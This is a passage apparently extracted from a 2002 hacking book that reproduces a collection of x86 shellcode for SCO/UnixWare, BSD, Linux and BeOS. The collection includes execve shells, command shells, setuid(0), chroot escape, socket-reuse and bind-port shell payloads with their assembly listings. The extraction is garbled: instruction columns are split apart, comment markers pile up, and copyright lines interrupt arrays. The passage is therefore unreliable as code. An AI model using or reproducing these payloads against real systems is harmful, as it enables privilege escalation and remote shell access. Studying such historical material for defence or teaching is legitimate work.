%ecx,%eax
stosl
%eax,%es:(%edi)
xchgl
%eax,%ebp
movb
$0x54,%ch
pushl
%ecx
movw
$0x0101,%cx
pushl
%ecx
xorl
%eax,%eax
movb
$0x36,%al
call
*%esi
popl
%ecx
xorl
%ebx,%ebx
cmpl
%ebx,%eax
jne
<findsckcode+47>
movw
$0x1234,%bx
cmpw
%bx,0x2(%ebp)
je
<findsckcode+49>
loop
<findsckcode+23>
pushb
$0x09
pushl
%ecx
xchgl
%ecx,%eax
movb
$0x03,%cl
decl
%ecx
movl
%ecx,0x8(%esp)
incl
%ecx
movb
$0x3e,%al
call
*%esi
loop
<findsckcode+55>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char bindsckcode[]=

/* 73 bytes

*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


"\x33\xc0"
"\x68\xff\x02\x12\x34"
"\x89\xe7"
"\x40"
"\x50"
"\x48"
"\x50"
"\x50"
"\xb0\x02"
"\x50"
"\x50"
"\xb0\xe6"
"\xff\xd6"
"\x8b\xd8"
"\x33\xc0"
"\x89\x47\x04"
"\x6a\x10"
"\x57"
"\x53"
"\xb0\xe8"
"\xff\xd6"
"\x6a\x05"
"\x53"
"\xb0\xe9"
"\xff\xd6"
"\x33\xc0"
"\x50"
"\x50"
"\x53"
"\xb0\xea"
"\xff\xd6"
"\x8b\xd8"
"\x6a\x09"
"\x53"
"\x91"
"\xb1\x03"
"\x49"
"\x89\x4c\x24\x08"
"\x41"
"\xb0\x3e"
"\xff\xd6"
"\xe2\xf4"

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

xorl
pushl
movl
incl
pushl
decl
pushl
pushl
movb
pushl
pushl
movb
call
movl
xorl
movl
pushb
pushl
pushl
movb
call
pushb
pushl
movb
call
xorl
pushl
pushl
pushl
movb
call
movl
pushb
pushl
xchgl
movb
decl
movl
incl
movb
call
loop

%eax,%eax
$0x341202ff
$esp,%edi
%eax
%eax
%eax
%eax
%eax
$0x02,%al
%eax
%eax
$0xe6,%al
*%esi
%eax,%ebx
%eax,%eax
%eax,0x4(%edi)
$0x10
%edi
%ebx
$0xe8,%al
*%esi
$0x05
%ebx
$0xe9,%al
*%esi
%eax,%eax
%eax
%eax
%ebx
$0xea,%al
*%esi
%eax,%ebx
$0x09
%ebx
%ecx,%eax
$0x03,%cl
%ecx
%ecx,0x8(%esp)
%ecx
$0x3e,%al
*%esi
<bindsckcode+61>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

%esp,%eax

*/
*/

;
char jump[]=
"\x8b\xc4"
"\xc3"
;

/* movl
/* ret

#define FINDSCKPORTOFS
#define BINDSCKPORTOFS

39
05

#endif

SCOfOpenServer,Unixwareg/x86 codes, file:x86-sco


/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland
/*## asmcodes for openserver 5.0.4 unixware 7.0 x86
/*
syscall
----------exec
exec
setuid
mkdir
chroot
chdir
ioctl
close
dup
*/

%eax
---x00b
x00b
x017
x050
x03d
x00c
x036
x006
x029

*://lsd-pl.net/ #*/
#*/

stack
--------------------------------------------------------------ret,->path="/bin/ksh",->[->a0=path,0]
ret,->path="/bin/ksh",->[->a0=path,->a1="-c",->a2=cmd,0]
ret,uid=0
ret,->path="b..",mode= (each value is valid)
ret,->path={"b..","."}
ret,->path=".."
ret,sfd,TI_GETPEERNAME=0x5491,->[mlen=0x91,len=0x91,->sadr=[]]
ret,fd={0,1,2}
ret,sfd

#if defined(X86) && ( defined(OPENSERVER) || defined(UNIXWARE) )


char _shellcode[]=

/* 33+8 bytes

*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


"\xeb\x1a"
"\x33\xd2"
"\x58"
"\x8d\x78\x14"
"\x57"
"\x50"
"\xab"
"\x92"
"\xab"
"\x88\x42\x08"
"\x83\xef\x3b"
"\xb0\x9a"
"\xab"
"\x47"
"\xb0\x07"
"\xab"
"\xb0\x0b"
"\xe8\xe1\xff\xff\xff"
"/bin/ksh"

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

jmp
xorl
popl
leal
pushl
pushl
stosl
xchgl
stosl
movb
subl
movb
stosl
incl
movb
stosl
movb
call

char syscallcode[]=
"\x33\xc0"
"\xeb\x09"
"\x5f"
"\x57"
"\x47"
"\xab"
"\x47"
"\xaa"
"\x5e"
"\xeb\x0d"
"\xe8\xf2\xff\xff\xff"
"\x9a\xff\xff\xff\xff"
"\x07\xff"
"\xc3"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

26 bytes
xorl
%eax,%eax
jmp
<syscallcode+13>
popl
%edi
pushl
%edi
incl
%edi
stosl
%eax,%es:(%edi)
incl
%edi
stosb
%al,%es:(%edi)
popl
%esi
jmp
<syscallcode+26>
call
<syscallcode+4>

/* ret

*/

char shellcode[]=
"\xeb\x12"
"\x33\xd2"
"\x58"
"\x8d\x78\x14"
"\x57"
"\x50"
"\xab"
"\x92"
"\xab"
"\x88\x42\x08"
"\xb0\x0b"
"\xff\xd6"
"\xe8\xe9\xff\xff\xff"
"/bin/ksh"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

25+8 bytes
jmp
<shellcode+20>
xorl
%edx,%edx
popl
%eax
leal
0x14(%eax),edi
pushl
%edi
pushl
%eax
stosl
%eax,%es:(%edi)
xchgl
%eax,%edx
stosl
%eax,%es:(%edi)
movb
%al,0x8(%edx)
movb
$0x0b,%al
call
*%esi
call
<shellcode+2>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char cmdshellcode[]=
"\xeb\x1d"
"\x33\xd2"
"\x58"
"\x8d\x78\xac"
"\x57"
"\x50"
"\x88\x50\x08"
"\x88\x50\x0b"
"\xab"
"\x8d\x40\x09"
"\xab"
"\x8d\x40\x03"
"\xab"
"\x92"
"\xab"
"\xb0\x0b"
"\xff\xd6"
"\xe8\xde\xff\xff\xff"
"/bin/ksh -c "
/* command */
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

36+12+cmdlen bytes
jmp
<cmdshellcode+31>
xorl
%edx,%edx
popl
%eax
leal
-0x44(%eax),edi
pushl
%edi
pushl
%eax
movb
%dl,0x8(%eax)
movb
%dl,0xb(%eax)
stosl
%eax,%es:(%edi)
leal
0x09(%eax),%eax
stosl
%eax,%es:(%edi)
leal
0x03(%eax),%eax
stosl
%eax,%es:(%edi)
xchgl
%eax,%edx
stosl
%eax,%es:(%edi)
movb
$0x0b,%al
call
*%esi
call
<cmdshellcode+2>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

<shellcode+28>
%edx,%edx
%eax
0x14(%eax),%edi
%edi
%eax
%eax,%es:(%edi)
%eax,%edx
%eax,%es:(%edi)
%al,0x8(%edx)
$0x3b,%edi
$0x9a,%al
%eax,%es:(%edi)
%edi
$0x07,%al
%eax,%es:(%edi)
$0x0b,%al
<shellcode+2>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book

char setuidcode[]=
"\x33\xc0"
"\x50"
"\xb0\x17"
"\xff\xd6"
;

/*
/*
/*
/*
/*

7 bytes
xorl
pushl
movb
call

char chrootcode[]=
"\x68""b..."
"\x89\xe7"
"\x33\xc0"
"\x88\x47\x03"
"\x57"
"\xb0\x50"
"\xff\xd6"
"\x57"
"\xb0\x3d"
"\xff\xd6"
"\x47"
"\x33\xc9"
"\xb1\xff"
"\x57"
"\xb0\x0c"
"\xff\xd6"
"\xe2\xfa"
"\x47"
"\x57"
"\xb0\x3d"
"\xff\xd6"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

40 bytes
pushl
$0x2e2e2e62
movl
%esp,%edi
xorl
%eax,%eax
movb
%al,0x3(%edi)
pushl
%edi
movb
$0x50,%al
call
*%esi
pushl
%edi
movb
$0x3d,%al
call
*%esi
incl
%edi
xorl
%ecx,%ecx
movb
$0xff,%cl
pushl
%edi
movb
$0x0c,%al
call
*%esi
loop
<chrootcode+28>
incl
%edi
pushl
%edi
movb
$0x3d,%al
call
*%esi

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

67 bytes
pushl
%esi
popl
%edi
subl
$0x7c,%edi
pushl
%edi
leal
0x10(%edi),%ecx
movb
$0x91,%al
stosl
%eax,%es:(%edi)
stosl
%eax,%es:(%edi)
xchgl
%ecx,%eax
stosl
%eax,%es:(%edi)
xchgl
%eax,%ebp
movb
$0x54,%ch
pushl
%ecx
movw
$0x0101,%cx
pushl
%ecx
xorl
%eax,%eax
movb
$0x36,%al
call
*%esi
popl
%ecx
xorl
%ebx,%ebx
cmpl
%ebx,%eax
jne
<findsckcode+47>
movw
$0x1234,%bx
cmpw
%bx,0x2(%ebp)
je
<findsckcode+49>
loop
<findsckcode+23>
movl
%ecx,%ebx
movb
$0x03,%cl
decl
%ecx
pushl
%ecx
movb
$0x06,%al
call
*%esi
pushl
%ebx
movb
$0x29,%al
call
*%esi
incl
%ecx
loop
<findsckcode+53>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

#if defined(UNIXWARE)
char findsckcode[]=
"\x56"
"\x5f"
"\x83\xef\x7c"
"\x57"
"\x8d\x4f\x10"
"\xb0\x91"
"\xab"
"\xab"
"\x91"
"\xab"
"\x95"
"\xb5\x54"
"\x51"
"\x66\xb9\x01\x01"
"\x51"
"\x33\xc0"
"\xb0\x36"
"\xff\xd6"
"\x59"
"\x33\xdb"
"\x3b\xc3"
"\x75\x0a"
"\x66\xbb\x12\x34"
"\x66\x39\x5d\x02"
"\x74\x02"
"\xe2\xe6"
"\x8b\xd9"
"\xb1\x03"
"\x49"
"\x51"
"\xb0\x06"
"\xff\xd6"
"\x53"
"\xb0\x29"
"\xff\xd6"
"\x41"
"\xe2\xf2"
;
#endif
char jump[]=
"\x8b\xc4"
"\xc3"

/* movl
/* ret

%eax,%eax
%eax
$0x17,%al
*%esi

%esp,%eax

*/
*/
*/
*/
*/

*/
*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


;
#define FINDSCKPORTOFS
#define BINDSCKPORTOFS
#define SCO

39
05

#endif

fFree,Net,OpengBSD/x86 codes, file: x86-bsd


/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland
/*## asmcodes for freebsd 3.4 openbsd 2.8 netbsd 1.5 x86
/*
syscall
----------execve
execve
setuid
mkdir
chroot
chdir
getpeername
socket
bind
listen
accept
dup2
*/

%eax
---x03b
x03b
x017
x088
x03d
x00c
x01f
x061
x068
x06a
x01e
x05a

*://lsd-pl.net/ #*/
#*/

stack
--------------------------------------------------------------ret,->path="/bin//sh",->[->a0=0],0
ret,->path="/bin//sh",->[->a0=path,->a1="-c",->a2=cmd,0],0
ret,uid=0
ret,->path="b..",mode= (each value is valid)
ret,->path={"b..","."}
ret,->path=".."
ret,sfd,->sadr=[],->[len=0x10]
ret,AF_INET=2,SOCK_STREAM=1,prot=0
ret,sfd,->sadr=[0xff,2,hi,lo,0,0,0,0],->[0x10]
ret,sfd,backlog=5
ret,sfd,0,0
ret,sfd,fd={0,1,2}

#if defined(X86) && ( defined(OPENBSD) || defined(FREEBSD) || defined(NETBSD) )


char shellcode[]=
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x54"
"\x53"
"\x50"
"\xb0\x3b"
"\xcd\x80"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

23 bytes
xorl
%eax,%eax
pushl
%eax
pushl
$0x68732f2f
pushl
$0x6e69622f
movl
%esp,%ebx
pushl
%eax
pushl
%esp
pushl
%ebx
pushl
%eax
movb
$0x3b,%al
int
$0x80

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char cmdshellcode[]=
"\xeb\x25"
"\x59"
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x66\x68""-c"
"\x89\xe7"
"\x50"
"\x51"
"\x57"
"\x53"
"\x89\xe7"
"\x50"
"\x57"
"\x53"
"\x50"
"\xb0\x3b"
"\xcd\x80"
"\xe8\xd6\xff\xff\xff"
/* command */
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

44+cmdlen bytes
jmp
<cmdshellcode+39>
popl
%ecx
xorl
%eax,%eax
pushl
%eax
pushl
$0x68732f2f
pushl
$0x6e69622f
movl
%esp,%ebx
pushl
%eax
pushw
$0x632d
movl
%esp,%edi
pushl
%eax
pushl
%ecx
pushl
%edi
pushl
%ebx
movl
%esp,%edi
pushl
%eax
pushl
%edi
pushl
%ebx
pushl
%eax
movb
$0x0b,%al
int
$0x80
call
<cmdshellcode+2>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char setuidcode[]=
"\x33\xc0"
"\x50"
"\xb0\x17"

/*
/*
/*
/*

7 bytes
xorl
%eax,%eax
pushl
%eax
movb
$0x17,%al

*/
*/
*/
*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


"\x50"
"\xcd\x80"

/* pushl
/* int

%eax
$0x80

*/
*/

;
char chrootcode[]=
"\x68""b..."
"\x89\xe7"
"\x33\xc0"
"\x88\x47\x03"
"\x57"
"\xb0\x88"
"\x50"
"\xcd\x80"
"\x57"
"\xb0\x3d"
"\x50"
"\xcd\x80"
"\x47"
"\x33\xc9"
"\xb1\xff"
"\x57"
"\x50"
"\xb0\x0c"
"\xcd\x80"
"\xe2\xfa"
"\x47"
"\x57"
"\xb0\x3d"
"\x50"
"\xcd\x80"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

44 bytes
pushl
$0x2e2e2e62
movl
%esp,%edi
xorl
%eax,%eax
movb
%al,0x3(%edi)
pushl
%edi
movb
$0x88,%al
pushl
%eax
int
$0x80
pushl
%edi
movb
$0x3d,%al
pushl
%eax
int
$0x80
incl
%edi
xorl
%ecx,%ecx
movb
$0xff,%cl
pushl
%edi
pushl
%eax
movb
$0x0c,%al
int
$0x80
loop
<chrootcode+31>
incl
%edi
pushl
%edi
movb
$0x3d,%al
pushl
%eax
int
$0x80

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char findsckcode[]=
"\x56"
"\x5f"
"\x83\xef\x7c"
"\x57"
"\xb0\x10"
"\xab"
"\x57"
"\x31\xc9"
"\xb1\xff"
"\x51"
"\x33\xc0"
"\xb0\x1f"
"\x51"
"\xcd\x80"
"\x59"
"\x59"
"\x33\xdb"
"\x3b\xc3"
"\x75\x0a"
"\x66\xbb\x12\x34"
"\x66\x39\x5f\x02"
"\x74\x02"
"\xe2\xe4"
"\x51"
"\x50"
"\x91"
"\xb1\x03"
"\x49"
"\x89\x4c\x24\x08"
"\x41"
"\xb0\x5a"
"\xcd\x80"
"\xe2\xf4"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

59 bytes
pushl
%esi
popl
%edi
subl
$0x7c,%edi
pushl
%edi
movb
$0x10,%al
stosl
%eax,%es:(%edi)
pushl
%edi
xorl
%ecx,%ecx
movb
$0xff,%cl
pushl
%ecx
xorl
%eax,%eax
movb
$0x1f,%al
pushl
%ecx
int
$0x80
popl
%ecx
popl
%ecx
xorl
%ebx,%ebx
cmpl
%ebx,%eax
jne
<findsckcode+40>
movw
$0x1234,%bx
cmpw
%bx,0x2(%edi)
je
<findsckcode+42>
loop
<findsckcode+14>
pushl
%ecx
pushl
%eax
xchgl
%ecx,%eax
movb
$0x03,%cl
decl
%ecx
movl
%ecx,0x8(%esp)
incl
%ecx
movb
$0x5a,%al
int
$0x80
loop
<findsckcode+47>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char bindsckcode[]=
"\x33\xc0"
"\x68\xff\x02\x12\x34"
"\x89\xe7"
"\x50"
"\x6a\x01"
"\x6a\x02"
"\xb0\x61"
"\x50"

/*
/*
/*
/*
/*
/*
/*
/*
/*

70 bytes
xorl
%eax,%eax
pushl
$0x341202ff
movl
%esp,%edi
pushl
%eax
pushl
$0x01
pushl
$0x02
movb
$0x61,%al
pushl
%eax

*/
*/
*/
*/
*/
*/
*/
*/
*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


"\xcd\x80"
"\x8b\xd8"
"\x33\xc0"
"\x89\x47\x04"
"\x6a\x10"
"\x57"
"\x53"
"\xb0\x68"
"\x50"
"\xcd\x80"
"\x6a\x05"
"\x53"
"\xb0\x6a"
"\x50"
"\xcd\x80"
"\x33\xc0"
"\x50"
"\x50"
"\x53"
"\xb0\x1e"
"\x50"
"\xcd\x80"
"\x50"
"\x50"
"\x91"
"\xb1\x03"
"\x49"
"\x89\x4c\x24\x08"
"\x41"
"\xb0\x5a"
"\xcd\x80"
"\xe2\xf4"

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

int
movl
xorl
movl
pushb
pushl
pushl
movb
pushl
int
pushb
pushl
movb
pushl
int
xorl
pushl
pushl
pushl
movb
pushl
int
pushl
pushl
xchgl
movb
decl
movl
incl
movb
int
loop

$0x80
%eax,%ebx
%eax,%eax
%eax,0x4(%edi)
$0x10
%edi
%ebx
$0x68,%al
%eax
$0x80
$0x05
%ebx
$0x6a,%al
%eax
$0x80
%eax,%eax
%eax
%eax
%ebx
$0x1e,%al
%eax
$0x80
%eax
%eax
%ecx,%eax
$0x03,%cl
%ecx
%ecx,0x8(%esp)
%ecx
$0x5a,%al
$0x80
<bindsckcode+58>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

%esp,%eax

*/
*/

;
char jump[]=
"\x8b\xc4"
"\xc3"
;

/* movl
/* ret

#define FINDSCKPORTOFS
#define BINDSCKPORTOFS
#define BSD

32
05

#endif

Linux/x86 codes, file: x86-linux


/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland
/*## asmcodes for linux (redhat 6.2) x86
/*
syscall
----------exec
exec
setuid
mkdir
chroot
chdir
socketcall
socketcall
socketcall
socketcall
socketcall
dup2
*/

%eax
---x00b
x00b
x017
x027
x03d
x00c
x066
x066
x066
x066
x066
x03f

*://lsd-pl.net/ #*/
#*/

%ebx,%ecx,%edx
--------------------------------------------------------------->path="/bin//sh",->[->a0=path,0]
->path="/bin//sh",->[->a0=path,->a1="-c",->a2=cmd,0]
uid=0
->path="b..",mode=0 (each value is valid)
->path={"b..","."}
->path=".."
getpeername=7,->[sfd,->sadr=[],->[len=0x10]]
socket=1,->[AF_INET=2,SOCK_STREAM=2,prot=0]
bind=2,->[sfd,->sadr=[0xff,2,hi,lo,0,0,0,0],len=0x10]
listen=4,->[sfd,backlog=102]
accept=5,->[sfd,0,0]
sfd,fd={2,1,0}

#if defined(X86) && defined(LINUX)


char shellcode[]=
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"

/*
/*
/*
/*
/*
/*
/*

24 bytes
xorl
%eax,%eax
pushl
%eax
pushl
$0x68732f2f
pushl
$0x6e69622f
movl
%esp,%ebx
pushl
%eax

*/
*/
*/
*/
*/
*/
*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


/*
/*
/*
/*
/*

pushl
movl
cdql
movb
int

$0x0b,%al
$0x80

*/
*/
*/
*/
*/

char cmdshellcode[]=
"\xeb\x22"
"\x59"
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x66\x68""-c"
"\x89\xe7"
"\x50"
"\x51"
"\x57"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80"
"\xe8\xd9\xff\xff\xff"
/* command */
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

40+cmdlen bytes
jmp
<cmdshellcode+36>
popl
%ecx
xorl
%eax,%eax
pushl
%eax
pushl
$0x68732f2f
pushl
$0x6e69622f
movl
%esp,%ebx
pushl
%eax
pushw
$0x632d
movl
%esp,%edi
pushl
%eax
pushl
%ecx
pushl
%edi
pushl
%ebx
movl
%esp,%ecx
cdql
movb
$0x0b,%al
int
$0x80
call
<cmdshellcode+2>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char setuidcode[]=
"\x33\xc0"
"\x31\xdb"
"\xb0\x17"
"\xcd\x80"
;

/*
/*
/*
/*
/*

8 bytes
xorl
xorl
movb
int

*/
*/
*/
*/
*/

char chrootcode[]=
"\x33\xc0"
"\x50"
"\x68""bb.."
"\x89\xe3"
"\x43"
"\x33\xc9"
"\xb0\x27"
"\xcd\x80"
"\x33\xc0"
"\xb0\x3d"
"\xcd\x80"
"\x43"
"\xb1\xff"
"\xb0\x0c"
"\xcd\x80"
"\xe2\xfa"
"\x43"
"\xb0\x3d"
"\xcd\x80"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

37 bytes
xorl
%eax,%eax
pushl
%eax
pushl
$0x2e2e6262
movl
%esp,%ebx
incl
%ebx
xorl
%ecx,%ecx
movb
$0x27,%al
int
$0x80
xorl
%eax,%eax
movb
$0x3d,%al
int
$0x80
incl
%ebx
movb
$0xff,%cl
movb
$0x0c,%al
int
$0x80
loop
<chrootcode+21>
incl
%ebx
movb
$0x3d,%al
int
$0x80

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char findsckcode[]=
"\x31\xdb"
"\x89\xe7"
"\x8d\x77\x10"
"\x89\x77\x04"
"\x8d\x4f\x20"
"\x89\x4f\x08"
"\xb3\x10"
"\x89\x19"
"\x31\xc9"
"\xb1\xff"
"\x89\x0f"
"\x51"
"\x31\xc0"
"\xb0\x66"
"\xb3\x07"
"\x89\xf9"
"\xcd\x80"

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

72 bytes
xorl
%ebx,%ebx
movl
%esp,%edi
leal
0x10(%edi),%esi
movl
%esi,0x4(%edi)
leal
0x20(%edi),%ecx
movl
%ecx,0x8(%edi)
movb
$0x10,%bl
movl
%ebx,(%ecx)
xorl
%ecx,%ecx
movb
$0xff,%cl
movl
%ecx,(%edi)
pushl
%ecx
xorl
%eax,%eax
movb
$0x66,%al
movb
$0x07,%bl
movl
%edi,%ecx
int
$0x80

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80"

%ebx
%esp,%ecx

%eax,%eax
%ebx,%ebx
$0x17,%al
$0x80

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


"\x59"
"\x31\xdb"
"\x39\xd8"
"\x75\x0a"
"\x66\xb8\x12\x34"
"\x66\x39\x46\x02"
"\x74\x02"
"\xe2\xe0"
"\x89\xcb"
"\x31\xc9"
"\xb1\x03"
"\x31\xc0"
"\xb0\x3f"
"\x49"
"\xcd\x80"
"\x41"
"\xe2\xf6"

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

popl
xorl
cmpl
jne
movw
cmpw
je
loop
movl
xorl
movb
xorl
movb
decl
int
incl
loop

%ecx
%ebx,%ebx
%ebx,%eax
<findsckcode+54>
$0x1234,%bx
%bx,0x2(%esi)
<findsckcode+56>
<findsckcode+24>
%ecx,%ebx
%ecx,%ecx
$0x03,%cl
%eax,%eax
$0x3f,%al
%ecx
$0x80
%ecx
<findsckcode+62>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char bindsckcode[]=
"\x33\xc0"
"\x50"
"\x68\xff\x02\x12\x34"
"\x89\xe7"
"\x50"
"\x6a\x01"
"\x6a\x02"
"\x89\xe1"
"\xb0\x66"
"\x31\xdb"
"\x43"
"\xcd\x80"
"\x6a\x10"
"\x57"
"\x50"
"\x89\xe1"
"\xb0\x66"
"\x43"
"\xcd\x80"
"\xb0\x66"
"\xb3\x04"
"\x89\x44\x24\x04"
"\xcd\x80"
"\x33\xc0"
"\x83\xc4\x0c"
"\x50"
"\x50"
"\xb0\x66"
"\x43"
"\xcd\x80"
"\x89\xc3"
"\x31\xc9"
"\xb1\x03"
"\x31\xc0"
"\xb0\x3f"
"\x49"
"\xcd\x80"
"\x41"
"\xe2\xf6"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

73 bytes
xorl
%eax,%eax
pushl
%eax
pushl
$0x341202ff
movl
%esp,%edi
pushl
%eax
pushb
$0x01
pushb
$0x02
movl
%esp,%ecx
movb
$0x66,%al
xorl
%ebx,%ebx
incl
%ebx
int
$0x80
pushb
$0x10
pushl
%edi
pushl
%eax
movl
%esp,%ecx
movb
$0x66,%al
incl
%ebx
int
$0x80
movb
$0x66,%al
movb
$0x04,%bl
movl
%eax,0x4(%esp)
int
$0x80
xorl
%eax,%eax
addl
$0x0c,%esp
pushl
%eax
pushl
%eax
movb
$0x66,%al
incl
%ebx
int
$0x80
movl
%eax,%ebx
xorl
%ecx,%ecx
movb
$0x03,%cl
xorl
%eax,%eax
movb
$0x3f,%al
decl
%ecx
int
$0x80
incl
%ecx
loop
<bindsckcode+63>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

#define FINDSCKPORTOFS
#define BINDSCKPORTOFS

46
06

#endif

BeOS/x86 codes, file: x86-beos


/*
syscall
----------execv
execv
*/

%eax
---x03f
x03f

stack
--------------------------------------------------------------ret,anum=1,->[->path="/bin//sh"],0
ret,anum=3,->[->path="/bin//sh",->a1="-c",->a2=cmd],0

#if defined(X86) && defined(BEOS)

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book

char shellcode[]=
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x54"
"\x89\xe3"
"\x50"
"\x53"
"\x6a\x01"
"\x50"
"\xb0\xa2"
"\xcd\x25"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

25 bytes
xorl
%eax,%eax
pushl
%eax
pushl
$0x68732f2f
pushl
$0x6e69622f
pushl
%esp
movl
%esp,%ebx
pushl
%eax
pushl
%ebx
pushb
$0x01
pushl
%eax
movb
$0xa2,%al
int
$0x25

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char cmdshellcode[]=
"\xeb\x25"
"\x59"
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x66\x68""-c"
"\x89\xe7"
"\x51"
"\x57"
"\x53"
"\x89\xe3"
"\x50"
"\x53"
"\x6a\x03"
"\x50"
"\xb0\xa2"
"\xcd\x25"
"\xe8\xd6\xff\xff\xff"
/* command */
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
